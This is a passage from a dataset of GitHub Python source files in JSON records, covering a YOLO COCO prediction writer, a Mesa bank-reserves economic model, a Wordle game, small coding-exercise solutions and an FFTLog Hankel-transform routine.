416\n bottom = bottom * orig_height / 416\n\n width = round(right - left, 4)\n height = round(bottom - top, 4)\n\n\n if image_idx == (total_img_num - 1) and j == (len(classes) - 1):\n new_p.write(\n \"{\\\"image_id\\\":\" + str(orig_index) + \", \\\"category_id\\\":\" + str(coco_id) + \", \\\"bbox\\\":[\" + \\\n str(left) + \", \" + str(top) + \", \" + str(width) + \", \" + str(height) + \"], \\\"score\\\":\" + str(\n scores[j]) + \"}\")\n else:\n # print(\"corrected left, top, width, height\", left, top, width, height)\n new_p.write(\n \"{\\\"image_id\\\":\" + str(orig_index) + \", \\\"category_id\\\":\" + str(coco_id) + \", \\\"bbox\\\":[\" + \\\n str(left) + \", \" + str(top) + \", \" + str(width) + \", \" + str(height) + \"], \\\"score\\\":\" + str(\n scores[j]) + \"},\\n\")\n image_idx += 1\n new_p.write(\"]\")\n\n\n\n\n\n\n","repo_name":"HulkMaker/tensorflow-slim-yolov3","sub_path":"coco_predict_gpu.py","file_name":"coco_predict_gpu.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"77"} +{"seq_id":"72757174329","text":"\"\"\"\nThe following code was adapted from the Bank Reserves model included in Netlogo\nModel information can be found at: http://ccl.northwestern.edu/netlogo/models/BankReserves\nAccessed on: November 2, 2017\nAuthor of NetLogo code:\n Wilensky, U. (1998). NetLogo Bank Reserves model.\n http://ccl.northwestern.edu/netlogo/models/BankReserves.\n Center for Connected Learning and Computer-Based Modeling,\n Northwestern University, Evanston, IL.\n\"\"\"\n\nimport mesa\nimport numpy as np\n\nfrom bank_asset.agents import Bank, Firm\n\n\"\"\"\nIf you want to perform a parameter sweep, call batch_run.py instead of run.py.\nFor details see batch_run.py in the same directory as run.py.\n\"\"\"\n\n# Start of datacollector functions\n\n\ndef get_num_big_agents(model):\n \"\"\"return number of rich agents\"\"\"\n rich_agents = [a for a in model.schedule.agents if a.is_big()]\n return len(rich_agents)\n\ndef get_num_op_agents(model):\n \"\"\"return number of rich agents\"\"\"\n rich_agents = [a for a in model.schedule.agents if a.is_operating()]\n return len(rich_agents)\n\ndef get_num_n_op_agents(model):\n \"\"\"return number of rich agents\"\"\"\n rich_agents = [a for a in model.schedule.agents if a.is_not_operating()]\n return len(rich_agents)\n\ndef get_num_bankrupt_agents(model):\n \"\"\"return number of rich agents\"\"\"\n rich_agents = [a for a in model.schedule.agents if a.is_bankrupt()]\n return len(rich_agents)\n\ndef get_num_non_big_agents(model):\n \"\"\"return number of rich agents\"\"\"\n rich_agents = [a for a in model.schedule.agents if a.is_not_big()]\n return len(rich_agents)\n\ndef get_num_poor_agents(model):\n \"\"\"return number of poor agents\"\"\"\n poor_agents = [a for a in model.schedule.agents if a.is_small()]\n return len(poor_agents)\n\ndef get_num_mid_agents(model):\n \"\"\"return number of middle class agents\"\"\"\n mid_agents = [a for a in model.schedule.agents if a.is_medium()]\n return len(mid_agents)\n\ndef get_l_crisis(model):\n return model.bank.l_crisis\n\ndef get_total_savings(model):\n \"\"\"sum of all agents' savings\"\"\"\n agent_savings = [a.savings for a in model.schedule.agents]\n # return the sum of agents' savings\n return float(np.sum(agent_savings))\n\ndef get_number_transactions(model):\n return len(model.p_history)\n\ndef get_total_cash(model):\n \"\"\"sum of amounts of all cash in economy\"\"\"\n agent_cash = [a.cash for a in model.schedule.agents]\n # return the sum of all agents' wallets\n return float(np.sum(agent_cash))\n\ndef get_total_valuation(model):\n # sum of all agents' valuations\n firm_valuation = [a.valuation() for a in model.schedule.agents]\n return np.sum(firm_valuation)\n\ndef get_total_assets(model):\n agent_asset0s = [a.asset0 for a in model.schedule.agents]\n return float(np.sum(agent_asset0s))\n\ndef get_total_loans(model):\n # list of amounts of all agents' loans\n agent_loans = [a.loans for a in model.schedule.agents]\n # return sum of all agents' loans\n return float(np.sum(agent_loans))\n\ndef get_avg_p_asset0(model):\n return model.p_asset0\n\nclass BankReserves(mesa.Model):\n \"\"\"\n This model is a Mesa implementation of the Bank Reserves model from NetLogo.\n It is a highly abstracted, simplified model of an economy, with only one\n type of agent and a single bank representing all banks in an economy. People\n (represented by circles) move randomly within the grid. If two or more people\n are on the same grid location, there is a 50% chance that they will trade with\n each other. If they trade, there is an equal chance of giving the other agent\n $5 or $2. A positive trade balance will be deposited in the bank as savings.\n If trading results in a negative balance, the agent will try to withdraw from\n its savings to cover the balance. If it does not have enough savings to cover\n the negative balance, it will take out a loan from the bank to cover the\n difference. The bank is required to keep a certain percentage of deposits as\n reserves and the bank's ability to loan at any given time is a function of\n the amount of deposits, its reserves, and its current total outstanding loan\n amount.\n \"\"\"\n\n # grid height\n grid_h = 20\n # grid width\n grid_w = 20\n\n \"\"\"init parameters \"init_people\", \"rich_threshold\", and \"reserve_percent\"\n are all set via Slider\"\"\"\n\n def __init__(\n self,\n height=grid_h,\n width=grid_w,\n init_people=2,\n rich_threshold=10,\n poor_threshold = 5,\n reserve_percent=50,\n deposit_interest=1,\n loan_interest=2,\n risk_mu = 5,\n risk_sigma = 5,\n risk_preference = 0.5,\n p_asset0 = 10,\n fed_interest = 2,\n eta = 0.5,\n birthrate = 0.0,\n deathrate = 0.0,\n ):\n self.height = height\n self.width = width\n self.init_people = init_people\n self.schedule = mesa.time.RandomActivation(self)\n self.grid = mesa.space.MultiGrid(self.width, self.height, torus=True)\n # rich_threshold is the amount of savings a person needs to be considered \"rich\"\n self.rich_threshold = rich_threshold\n self.poor_threshold = poor_threshold\n self.reserve_percent = reserve_percent\n self.deposit_interest = deposit_interest\n self.loan_interest = loan_interest\n self.p_asset0 = p_asset0\n self.fed_interest = fed_interest\n self.p_history = []\n self.eta = eta\n self.birthrate = birthrate\n self.current_id = 0\n self.deathrate = deathrate\n \n \n # set risk asset profit and variance\n self.risk_mu = risk_mu\n self.risk_sigma = risk_sigma\n \n # set risk preference\n self.risk_preference = risk_preference\n \n # see datacollector functions above\n self.datacollector = mesa.DataCollector(\n model_reporters={\n \"Big\": get_num_big_agents,\n \"Bankrupt\": get_num_bankrupt_agents,\n \"Small\": get_num_non_big_agents,\n \"Total Savings\": get_total_savings,\n \"Total Valuation\": get_total_valuation,\n \"Total Assets\": get_total_assets,\n \"Total Loans\": get_total_loans,\n \"Average Price of Asset\": get_avg_p_asset0,\n \"Total Bank Liquidity Crisis\": get_l_crisis,\n \"Number of Transactions\": get_number_transactions,\n \"Total Cash\": get_total_cash,\n \"Operating\": get_num_op_agents,\n \"Not Operating\": get_num_n_op_agents,\n },\n agent_reporters={\"Valuation\": lambda x: x.valuation()},\n )\n\n # create a single bank for the model\n self.bank = Bank(1, self, self.reserve_percent, \n self.deposit_interest, self.loan_interest, self.risk_preference)\n\n # create people for the model according to number of people set by user\n for i in range(self.init_people):\n self.create_firm(self.bank)\n\n self.running = True\n self.datacollector.collect(self)\n \n\n def create_firm(self, bank, **kwargs):\n # set x, y coords randomly within the grid\n x = self.random.randrange(self.width)\n y = self.random.randrange(self.height)\n p = Firm(self.next_id(), (x, y), self, True, bank, deathrate=self.deathrate, **kwargs)\n # place the Person object on the grid at coordinates (x, y)\n self.grid.place_agent(p, (x, y))\n # add the Person object to the model schedule\n self.schedule.add(p)\n\n def adjust_p_asset0(self):\n if len(self.p_history) > 0:\n self.p_asset0 += self.eta * np.average(self.p_history)- (1-self.eta) * self.p_asset0\n self.p_history = []\n \n def report_p_asset0(self, p):\n self.p_history += [p]\n print('traded')\n\n def firm_birth(self):\n if self.random.random() < self.birthrate:\n self.create_firm(self.bank)\n print(\"birth\")\n\n def step(self):\n # bank adjust interest rates\n self.bank.adjust_rates()\n # tell all the agents in the model to run their step function\n self.schedule.step()\n # collect data\n self.datacollector.collect(self)\n # adjust average p_asset0 prices\n self.adjust_p_asset0()\n # create new firms\n self.firm_birth()\n\n def run_model(self):\n for i in range(self.run_time):\n self.step()","repo_name":"jonathanmli/agent-based-modelling","sub_path":"bank_reserve/bank_asset/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2703051227","text":"from classes import *\r\n\r\n\r\nclass MainPage(mtk.Tk):\r\n\r\n def __init__(self, *args, **kwargs):\r\n mtk.Tk.__init__(self, *args, **kwargs)\r\n\r\n self.title(\" \")\r\n self.geometry(\"500x500\")\r\n\r\n container = mtk.Frame(self)\r\n container.pack(side=\"top\", fill=\"both\", expand=True)\r\n container.grid_rowconfigure(0, weight=1)\r\n container.grid_columnconfigure(0, weight=1)\r\n\r\n self.frames = {}\r\n all_frames = (startPage, loginPage, votePage, resultsPage)\r\n\r\n for F in all_frames:\r\n page_name = F.__name__\r\n frame = F(parent=container, controller=self)\r\n self.frames[page_name] = frame\r\n\r\n frame.grid(row=0, column=0, sticky=\"nsew\")\r\n \r\n self.show_frame(\"votePage\")\r\n\r\n def show_frame(self, page_name):\r\n frame = self.frames[page_name]\r\n frame.tkraise()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = MainPage()\r\n app.mainloop()\r\n","repo_name":"santhanh3000/voting-app","sub_path":"system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17105429639","text":"# N, K을 공백을 기준으로 구분하여 int로 변환(map)\nn, k = map(int, input().split())\n\nresult = 0\n\nwhile True:\n # N이 K로 나누어 떨어지는 수가 될 때까지 빼기\n target = (n // k) * k\n result += n - target # 1을 빼는 연산의 개수를 result에 더하기\n n = target\n\n # N이 K보다 작을 때(더 이상 나눌 수 없을 때) 반복문 탈출\n if n < k:\n break\n\n # K로 나누기\n result += 1\n n //= k\n\n# 마지막으로 남은 수에 대하여 1씩 빼기\n# n이 1보다 크다면, 그만큼 빼줘야한다. 그 회수를 result에 더한다.\nresult += (n - 1)\nprint(1)\n","repo_name":"bmh8993/coding-test","sub_path":"dongbin-cote/1이_될_때까지/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39757080359","text":"from collections import deque\n\ndef bagOfTokensScore(tokens, power):\n output = 0\n queue = deque(sorted(tokens))\n score = 0\n while queue and (queue[0] <= power or score):\n if queue[0] <= power:\n power -= queue.popleft()\n score += 1\n else:\n power += queue.pop()\n score -= 1\n output = max(output,score)\n return output\n\n# Sort the tokens array and transform it into a deque\n# Greedily take the lowest tokens and if power is smaller than the first token\n# in the queue and score is greater than 0, take the highest token.\n# O(nlogn), O(n) space\ntokens = [100]\npower = 50\nmaximumScore = bagOfTokensScore(tokens,power)\nprint(maximumScore)\n","repo_name":"patchangg/LeetCode","sub_path":"Python/Medium/948.py","file_name":"948.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30259397714","text":"from otree.api import (\n models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,\n Currency as c, currency_range\n)\n\n\ndoc = \"\"\"\nThis is a one-shot \"Prisoner's Dilemma\". Two players are asked separately\nwhether they want to Kooperieren or Alleingang. Their choices directly determine the\npayoffs.\n\"\"\"\n\n\nclass Constants(BaseConstants):\n name_in_url = 'prisoner'\n players_per_group = 2\n num_rounds = 1\n\n instructions_template = 'prisoner/instructions.html'\n\n # payoff if 1 player Alleingangs and the other Kooperierens\"\"\",\n betray_payoff = 3\n betrayed_payoff = 0\n\n # payoff if both players Kooperieren or both Alleingang\n both_cooperate_payoff = 2\n both_defect_payoff = 1\n\nclass Subsession(BaseSubsession):\n pass\n\nclass Group(BaseGroup):\n pass\n\nclass Player(BasePlayer):\n payoff_cur = models.IntegerField()\n\n decision = models.StringField(\n choices=['Cooperate', 'Defect'],\n doc=\"\"\"This player's decision\"\"\",\n widget=widgets.RadioSelect\n )\n\n def other_player(self):\n return self.get_others_in_group()[0]\n\n def set_payoff(self):\n\n payoff_matrix = dict(\n Cooperate=dict(\n Cooperate=Constants.both_cooperate_payoff,\n Defect=Constants.betrayed_payoff\n ),\n Defect=dict(\n Cooperate=Constants.betray_payoff,\n Defect=Constants.both_defect_payoff\n )\n )\n\n if self.decision is '' or self.other_player().decision is '':\n self.payoff_cur = 0\n else:\n self.payoff_cur = payoff_matrix[self.decision][self.other_player().decision]\n","repo_name":"Schmidtpk/Otree-ambiguity","sub_path":"prisoner/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33906548245","text":"'''\nReturneaza true daca n este prim si false daca nu...\n'''\n\ndef is_prime (n):\n if n < 2:\n return False\n else:\n i = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i = i + 1\n return True\n\n'''\nReturneaza produsul numerelor din lista lst.\n'''\n\ndef get_product (lst):\n product=1\n for i in (lst):\n product=product*i\n return product\n\n'''\nReturneaza CMMDC a doua numere x si y folosind primul algoritm.\n'''\n\ndef get_cmmdc_1(x, y):\n while x != y:\n if x > y:\n x = x - y\n else:\n y = y - x\n return x\n\n'''\nReturneaza CMMDC a doua numere x si y folosind al doilea algoritm.\n'''\n\ndef get_cmmdc_2(x, y):\n while y != 0:\n r = x % y\n x = y\n y = r\n return x\n\ndef main():\n val = False\n while not val:\n print(\"1.Verificare nr prim \")\n print(\"2. Produs a n numere\")\n print(\"3.CMMDC varianta 1\")\n print(\"4.CMMDC varianta 2\")\n print(\"x. Exit\")\n optiune = input()\n if optiune == '1':\n nr = int(input(\"Scrieti un nr: \"))\n print(is_prime(nr))\n elif optiune =='2':\n str = input(\"Adaugati nr separate prin virgula: \")\n lst = str.split(',')\n for i, x in enumerate(lst):\n lst[i]=int(x)\n print(get_product(lst))\n elif optiune == '3':\n a = int(input())\n b = int(input())\n print(get_cmmdc_1(a, b))\n elif optiune == '4':\n a = int(input())\n b = int(input())\n print(get_cmmdc_2(a, b))\n elif optiune == 'x':\n val = True\n else:\n print(\"Optiune incorecta\")\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n","repo_name":"AP-MI-2021/lab-1-EduardBarna","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31512440177","text":"# Data Structure HW_1\n# use python3.6\n# Edit by 劉岳樺_B10330010\n# Expression Converter\ninfix = []\npost_result = []\ntop = -1\nMAX = 50\nstack = [] * MAX\npost_answer = \"\"\npre_answer = \"\"\n\n\ndef push(st, val):\n global top\n if top == MAX-1:\n print('Stack Overflow!!!!')\n else:\n top += 1\n print('do PUSH~')\n st.insert(top, val)\n\n\ndef pop(st):\n global top\n if top == -1:\n print('Stack Underflow!!')\n return -1\n else:\n k = st[top]\n top -= 1\n print('do POP~')\n return k\n\n\ndef infix_to_postfix(content):\n # converting start here\n push(stack, '(')\n content += ')'\n for i in content:\n print(\"Now scan to:\", i)\n if i == ')':\n while not(stack[top] == '('):\n print(\"Meet ')' \")\n post_result.append(pop(stack))\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n if stack[top] == '(':\n pop(stack)\n elif not ((i == '(')or(i == '+')or(i == '-')or(i == '*')or(i == '/')or(i == '%')):\n post_result.append(i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n else:\n if i == '(':\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n # 處理 * 部分:\n elif i == '*':\n if stack[top] == '*':\n post_result.append(pop(stack))\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n elif (stack[top] == '/') or (stack[top] == '%'):\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n elif (stack[top] == '(') or (stack[top] == '+') or (stack[top] == '-'):\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n # 處理 / 部分\n elif i == '/':\n if (stack[top] == '*') or (stack[top] == '/'):\n post_result.append(pop(stack))\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n elif stack[top] == '%':\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n elif (stack[top] == '(') or (stack[top] == '+') or (stack[top] == '-'):\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n # 處理 % 部分\n elif i == '%':\n if (stack[top] == '*') or (stack[top] == '/') or (stack[top] == '%'):\n post_result.append(pop(stack))\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n elif (stack[top] == '(') or (stack[top] == '+') or (stack[top] == '-'):\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n # 處理+ -部分\n elif (i == '+') or (i == '-'):\n if (stack[top] == '*') or (stack[top] == '/') or (stack[top] == '%'):\n post_result.append(pop(stack))\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n elif (stack[top] == '+') or (stack[top] == '-'):\n post_result.append(pop(stack))\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n\n else:\n push(stack, i)\n print(\"Stack:\", stack)\n print(\"postfix:\", post_result, \"\\n\")\n print(\"========== convert end ==========\", \"\\n\\n\")\n return post_result\n\n\ndef infix_to_prefix(content):\n rev_content = []\n pre_ans = []\n print(\"========== prefix convert start ==========\")\n for i in content:\n if i == '(':\n i = ')'\n elif i == ')':\n i = '('\n rev_content.insert(0, i)\n\n ans = infix_to_postfix(rev_content)\n\n for i in ans:\n pre_ans.insert(0, i)\n return pre_ans\n\n\nprint('This is an Expression Converter\\n')\ninfix = input('輸入一段infix計算式:')\n\n# show the postfix result\nfor x in infix_to_postfix(infix):\n post_answer += x\n\n# post_result and stack clean\n# convert into prefix\npost_result.clear()\nstack.clear()\ntop = -1\nfor x in infix_to_prefix(infix):\n pre_answer += x\n\nprint(\"***************************\")\nprint(\"***************************\")\nprint(\"The postfix is : \" + post_answer)\nprint(\"The prefix is :\" + pre_answer)\nprint(\"***************************\")\nprint(\"***************************\")\nprint(\"\\n\\nPress Enter to Continue...\")\ninput()\n","repo_name":"Yuehua-Liu/ExpressionConverter","sub_path":"ExpressionConvertor.py","file_name":"ExpressionConvertor.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72784899770","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom threading import Thread\nimport math\n\nwindow = tk.Tk()\nwindow.geometry(\"300x150\")\n\nlbl = tk.Label(window, text=\"Press Start\")\nlbl.place(width=280, height=60, x=10, y=10)\n\npb = ttk.Progressbar(window)\npb.place(width=280, height=25, x=10, y=80)\n\ndef calculate():\n \"\"\" 1 / i^2 = PI^2 / 6 \"\"\"\n s = 0.0\n for i in range(1, 10000001):\n s += (1 / i**2)\n if i % 1000000 == 0:\n value = math.sqrt(s * 6)\n lbl.config(text=value) #???\n pb.step(10) #???\n\ndef start():\n lbl.config(text=\"Press Start\")\n #calculate() #irresponsive GUI this way, obviously\n t = Thread(target=calculate)\n t.start()\n\nbtn = tk.Button(window, text=\"Start\", command=start)\nbtn.place(width=280, height=25, x=10, y=115)\n\nwindow.mainloop()","repo_name":"alissonws/SemabioToolKit","sub_path":"interface/teste threads.py","file_name":"teste threads.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36054868211","text":"\r\nclass Node:\r\n def __init__(self, val=None):\r\n self.left = None\r\n self.right = None\r\n self.val = val\r\n def insert(self, val):\r\n if not self.val:\r\n self.val = val\r\n return\r\n if self.val == val:\r\n return\r\n elif val < self.val:\r\n if self.left:\r\n self.left.insert(val)\r\n return\r\n self.left = Node(val)\r\n return\r\n else:\r\n if self.right:\r\n self.right.insert(val)\r\n return\r\n self.right = Node(val)\r\n def search(self, item):\r\n if self.val is None:\r\n return None\r\n if item == self.val:\r\n return self.val\r\n if item < self.val:\r\n if self.left is None:\r\n return None\r\n return self.left.search(item)\r\n if self.right is None:\r\n return None\r\n return self.right.search(item)\r\n def __in_order(self, result):\r\n if self.left is not None:\r\n result = self.left.__in_order(result)\r\n \r\n result.append(self.val)\r\n\r\n if self.right is not None:\r\n result = self.right.__in_order(result)\r\n return result\r\n def nodes(self):\r\n \r\n result = []\r\n result = self.__in_order(result)\r\n \r\n return result\r\n \r\n\r\n","repo_name":"marihabdi/Bank","sub_path":"Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20613119650","text":"from typing import List\nfrom colorama import Fore\n\nfrom wordle.wordle import Wordle\nfrom wordle.letter_state import LetterState\n\nclass Reporter:\n def __init__(self, wordle: Wordle):\n self.wordle = wordle\n\n def report(self, **kwargs):\n if kwargs.get('initial_message'):\n print(Fore.CYAN + \"\\nPress ctrl + C to Give Up\" + Fore.RESET)\n if kwargs.get('game_configs'):\n print(Fore.GREEN + f\"\\nGame Mode: \" + Fore.RESET + f\"{self.wordle._game_mode}\\n\"\n + Fore.GREEN + \"Word Length: \" + Fore.RESET + f\"{self.wordle.word_length}\")\n if kwargs.get('characters_exceeded'):\n print(Fore.RED + f\"Word must be {self.wordle.word_length} characters long!\" + Fore.RESET)\n elif kwargs.get('word_not_found'):\n print(Fore.RED + \"Word provided does not exist in the English dictionary.\" + Fore.RESET)\n elif kwargs.get('final_message'):\n print(f\"You've solved the puzzle in {self.wordle.taken_attempts} attempts!\") if self.wordle.is_solved\\\n else print(f\"\\nYou failed to solve the puzzle\\nThe answer was {Fore.CYAN + self.wordle.instance_secret + Fore.RESET}.\")\n elif kwargs.get('give_up'):\n print(\"\\n\\nYou Gave Up!\")\n print(f\"The answer was {self.wordle.instance_secret}.\")\n if self.wordle.attempts:\n self.display_results(give_up=True)\n print(\"Exiting...\")\n\n def _convert_result_to_color(self, result: List[LetterState])-> str:\n result_with_color = []\n\n for letter in result:\n if letter.is_in_position:\n color = Fore.GREEN\n elif letter.is_in_word:\n color = Fore.YELLOW\n else:\n color = Fore.WHITE\n \n colored_letter = color + letter.character + Fore.RESET\n result_with_color.append(colored_letter)\n\n return \" \".join(result_with_color)\n\n @staticmethod\n def _draw_game_board(lines: List[str], word_length: int, size: int = 9, padding: int = 1):\n content_length = (size + padding * 2) * word_length // 5\n\n top_border = \"┌\" + \"─\" * content_length + \"┐\"\n bottom_border = \"└\" + \"─\" * content_length + \"┘\"\n space = \" \" * padding\n\n print(top_border)\n for line in lines:\n print(\"│\" + space + line + space + \"│\")\n print(bottom_border)\n\n @staticmethod\n def _draw_keyboard(keyboard: List[dict]):\n for row in keyboard:\n print(' '.join(row.values()))\n\n def display_results(self, give_up=False):\n if not give_up:\n print(\"\\nYour results so far...\")\n print(f\"You have {self.wordle.remaining_attempts} attempts remaining.\")\n\n lines = []\n\n for word in self.wordle.attempts:\n result = self.wordle.guess(word)\n colored_result_str = self._convert_result_to_color(result=result)\n self.wordle.update_keyboard(result=result)\n lines.append(colored_result_str)\n\n for _ in range(self.wordle.remaining_attempts):\n lines.append(\" \".join([\"_\"] * self.wordle.word_length))\n\n print('\\n')\n if not give_up:\n print(f'- Attempt {self.wordle.taken_attempts} -')\n Reporter._draw_game_board(lines=lines, word_length=self.wordle.word_length)\n print('\\n')\n Reporter._draw_keyboard(keyboard=self.wordle.keyboard)\n print('-------------')\n","repo_name":"tiagovmvieira/Wordle","sub_path":"wordle/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10559416746","text":"import heapq\r\ndef solution(scoville, K):\r\n heap=[]\r\n for i in scoville:\r\n heapq.heappush(heap,i)\r\n \r\n count=0\r\n while heap[0]cut]\n\tasym_plus=(mu+1+asym_q)/2.\n\tasym_minus=(mu+1-asym_q)/2.\n\t\n\tq_good=q[ (np.absolute(imag_q) <=cut) & (q!=mu + 1 + 0.0j)]\n\n\talpha_plus=(mu+1+q_good)/2.\n\talpha_minus=(mu+1-q_good)/2.\n\t\n\tg_m[(np.absolute(imag_q) <=cut) & (q!= mu + 1 + 0.0j)] =gamma(alpha_plus)/gamma(alpha_minus)\n\n\t# high-order expansion\t\t\t\t\t\t\n\tg_m[np.absolute(imag_q)>cut] = exp( (asym_plus-0.5)*log(asym_plus) - (asym_minus-0.5)*log(asym_minus) - asym_q \\\n\t +1./12 *(1./asym_plus - 1./asym_minus) +1./360.*(1./asym_minus**3 - 1./asym_plus**3) +1./1260*(1./asym_plus**5 - 1./asym_minus**5) )\n\n\tg_m[np.where(q==mu+1+0.0j)[0]] = 0.+0.0j\n\t\n\treturn g_m\n\ndef log_gamma(z):\n\t\n\tz=gamma(z)\n\tw=log(z)\n\tx=np.real(w)\n\ty=np.imag(w)\n\treturn x,y\n\t\ndef get_k0(N,mu,q,r0,L,k0):\n\t\t\n\tkr=float(k0*r0)\n\tdelta_L=L/float(N)\n\t\n\tx=q + 1j*pi/delta_L\n\t\n\tx_plus=(mu+1+x)/2.\n\tx_minus=(mu+1-x)/2.\n\t\t\n\trp,phip=log_gamma(x_plus)\n\trm,phim=log_gamma(x_minus)\n\t\n\targ=log(2/kr)/delta_L + (phip - phim)/pi \n\tiarg=np.rint(arg)\n\tif ( arg != iarg):\n\t\tkr=kr*exp((arg-iarg)*delta_L)\n\t\t#kr=kr*exp((arg+iarg)*delta_L)\t\t# Hamilton sign \n\t\n\treturn kr \n\t\ndef u_m_vals_old(m,mu,q,kr,L):\n\n\tx=q + 1j*2*pi*m/L\n\t\n\talpha_plus=(mu+1+x)/2.\n\talpha_minus=(mu+1-x)/2.\n\t\t\n\trp, phip=log_gamma(alpha_plus) \n\trm, phim=log_gamma(alpha_minus) \n\t\n\tlog_r=q*log2 + rp - rm \n\tphi=2*pi*m/L*log(2./kr) + phip - phim \n\t\n\treal_part=exp(log_r)*cos(phi)\n\timag_part=exp(log_r)*sin(phi) \n\t\n\tu_m=real_part + 1j*imag_part \n\t\n\t# adjust endpoint, the N/2=m.size point \n\tu_m[m.size-1]=np.real(u_m[m.size-1])\n\treturn u_m\n\t\ndef u_m_vals(m,mu,q,kr,L):\n\n omega=1j*2*pi*m/L\n\n x=q + omega\n \n two_part=2**x \n \n U_mu=2**x*g_m_vals(mu,x)\n \n u_m=(kr)**(-omega)*U_mu\n \n u_m[m.size-1]=np.real(u_m[m.size-1])\n \n return u_m \n \ndef fft_log(k,f_k,q,mu):\n\n\n\tif ((q+mu) < -1) :\n\t\tprint('Error in reality condition for Bessel function integration.')\n\t\tprint(' q+mu is less than -1.')\n\t\tprint('See Abramowitz and Stegun. Handbook of Mathematical Functions pg. 486')\n\t\t\n\t\n\tif ( q > 1/2.) :\n\t\tprint('Error in reality condition for Bessel function integration.')\n\t\tprint(' q is greater than 1/2')\n\t\tprint('See Abramowitz and Stegun. Handbook of Mathematical Functions pg. 486')\n\n\t\t\n\t\t\t\t\n\tN=f_k.size\n\tdelta_L=(log(np.max(k))-log(np.min(k)))/float(N-1)\n\t#delta_L10=(np.log10(np.max(k))-np.log10(np.min(k)))/(N-1)\n\tL=(log(np.max(k))-log(np.min(k)))\n\t\t\n\t# find a better way to check if it is evenly spaced in log \n\tdiff=np.diff(np.log(k))\n\tdiff=np.diff(diff)\n\tif (np.sum(diff) >=1e-10):\n\t\tprint('You need to send in data that is sampled evenly in logspace')\n\t\tprint('Terminating code in fft_log')\n\t\tsys.exit()\n\t\t\n\t\n\tlog_k0=log(k[N//2])\n\tk0=exp(log_k0)\n\t\n\t# Fourier transform input data \n\t# get m values, shifted so the zero point is at the center\n\t\n\tc_m=rfft(f_k)\n\tm=np.fft.rfftfreq(N,d=1.)*float(N)\n\t# make r vector \n\t#kr=get_k0(float(N),mu,q,1/k0,L,k0)\n\tkr=1\n\tr0=kr/k0\n\tlog_r0=log(r0)\n\t\n\tm=np.fft.rfftfreq(N,d=1.)*float(N)\n\tm_r=np.arange(-N//2,N//2)\n\tm_shift=np.fft.fftshift(m_r)\n\t\n\t\n\t#s-array \n\ts=delta_L*(-m_r)+log_r0\t\t\n\tid=m_shift\n\tr=10**(s[id]/log(10))\n\t\n\t#m_shift=np.fft.fftshift(m)\n\t\n\t# get h array \t\n\th=delta_L*m + log_k0\n\t\t\n\tu_m=u_m_vals(m,mu,q,kr,L)\n\t#u_m=u_m_vals_old(m,mu,q,kr,L) old version will crash for large data set \n\n\tb=c_m*u_m\n\t\t\n\tA_m=irfft(b)\n\t\n\tA=A_m[id]\n\t\n\t# reverse the order \n\tA=A[::-1]\n\tr=r[::-1]\n\t\n\tif (q!=0):\n\t\tA=A*(r)**(-float(q))\n\t\t\n\treturn r, A \n\n##########################################################################################\n# End of fftlog algorithm \n\n\n\n##########################################################################################\n# function specific for power spectrum to correlation function (and vice versus) in \n# cosmology \ndef k_to_r(k,f_k,alpha_k=1.5, beta_r=-1.5, mu=.5, pf=(2*pi)**(-1.5),q=0):\n\t\n\t# module to calculate Hankel Transform\n\t# \\int_0^\\infty dk r A(k) J_mu(kr), via fftlog algorithm\n\t# Common application is for power spectrum:\n\t# \\xi(r)= \\int dk k^2 /(2 \\pi^2) \\sin(kr)/kr P(k) \n\t# in 